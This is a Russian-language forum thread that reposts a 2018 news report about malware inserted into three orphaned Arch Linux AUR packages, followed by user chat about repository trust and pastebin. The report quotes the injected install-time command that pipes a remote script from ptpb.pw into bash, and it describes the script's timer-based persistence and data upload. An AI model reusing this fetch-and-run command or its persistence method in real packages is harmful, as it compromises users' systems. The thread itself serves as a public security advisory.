В AUR-репозитории Arch Linux найдено вредоносное ПО

Аватара пользователя

Автор темы
x230
Сообщения: 1515
Зарегистрирован: 02 сен 2016, 19:07
Решено: 5
Откуда: Курилы/Сахалин/Кубань
Благодарил (а): 270 раз
Поблагодарили: 384 раза

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение x230 » 12 июл 2018, 05:27

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

Источник новости
моя платформа :
ОС: Linux Mint 18.3, x64 DE: Cinnamon 3.6.7 Ядро: 4.15.0-48 Browser: Pale Moon 28.*; Железо: Intel Core i3-3210; Mem 4GB; VGA - на борту.

Аватара пользователя

Chocobo
Сообщения: 9105
Зарегистрирован: 27 авг 2016, 19:57
Решено: 198
Откуда: НН
Благодарил (а): 632 раза
Поблагодарили: 2602 раза

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение Chocobo » 12 июл 2018, 07:34

Ничего удивительного)
Справедливости ради, нужно отметить, что с ппа или с дебками по прямым url такое тоже вполне может может произойти - т.к. таская пакеты мимо основного репа - там может найтись что угодно, в теории. И поставщику по надо в этом случае явно доверять.

Только вот ппа диверсифицированы, они маленькие и их много. Шанс что на хосте пользователя окажется конретный скомпрометированный реп с пакетом - в общем-то невелик.
А аур одна большая свалка с этим добром, причем тамошние pkgduild'ы вполне могут таскать для установки в арч те же дебки прямиком с ппа :hoho:
Изображение
   
Изображение

Аватара пользователя

zuzabrik
Сообщения: 1553
Зарегистрирован: 29 авг 2016, 09:08
Решено: 19
Благодарил (а): 97 раз
Поблагодарили: 487 раз

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение zuzabrik » 18 июл 2018, 14:45

Chocobo писал(а):
12 июл 2018, 07:34
pkgduild'ы
:-D :-D :-D

это топовое название для вредоносных пакетов! пекедждилды!
Наш IRC-канал для общения: #linuxmint-ru на сервере irc.spotchat.org
Для захода откройте HexChat, выберите сервер Linux Mint и наберите в чате /join #linuxmint-ru
Или любым другим удобным способом ;)

Аватара пользователя

Chocobo
Сообщения: 9105
Зарегистрирован: 27 авг 2016, 19:57
Решено: 198
Откуда: НН
Благодарил (а): 632 раза
Поблагодарили: 2602 раза

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение Chocobo » 18 июл 2018, 14:46

мда, опечатка из тех что нарочно не придумаешь :hoho:
Да простят меня арчеводы :-D
Изображение
   
Изображение

Аватара пользователя

StarMAUGLI
Сообщения: 1533
Зарегистрирован: 10 сен 2016, 07:16
Решено: 15
Откуда: Москва
Благодарил (а): 628 раз
Поблагодарили: 178 раз

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение StarMAUGLI » 18 июл 2018, 15:13

x230 писал(а):
12 июл 2018, 05:27
. В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com
С сайта pastebin.com, машинный перевод (яндексом):
Что такое Pastebin.com о чем?
Pastebin-это веб-сайт, где вы можете хранить любой текст в Интернете для легкого обмена. Веб-сайт в основном используется программистами для хранения фрагментов исходного кода или информации о конфигурации, но любой человек более чем может вставить любой тип текста. Идея сайта заключается в том, чтобы сделать его более удобным для людей, чтобы делиться большими объемами текста в интернете.

Вот я и думаю, какой практический смысл у этого сервиса? Мог бы я его хоть к какой-нибудь практической задаче приспособить? Или этот сервис для гуманоидов из совершенно другого, параллельного мира и мне их побуждения не понять никогда?

Аватара пользователя

zuzabrik
Сообщения: 1553
Зарегистрирован: 29 авг 2016, 09:08
Решено: 19
Благодарил (а): 97 раз
Поблагодарили: 487 раз

В AUR-репозитории Arch Linux найдено вредоносное ПО

Сообщение zuzabrik » 18 июл 2018, 15:17

StarMAUGLI писал(а):
18 июл 2018, 15:13
Вот я и думаю, какой практический смысл у этого сервиса? Мог бы я его хоть к какой-нибудь практической задаче приспособить?
обмен кусками кода или выводом терминала например.
Наш IRC-канал для общения: #linuxmint-ru на сервере irc.spotchat.org
Для захода откройте HexChat, выберите сервер Linux Mint и наберите в чате /join #linuxmint-ru
Или любым другим удобным способом ;)

Вернуться в «Другие новости»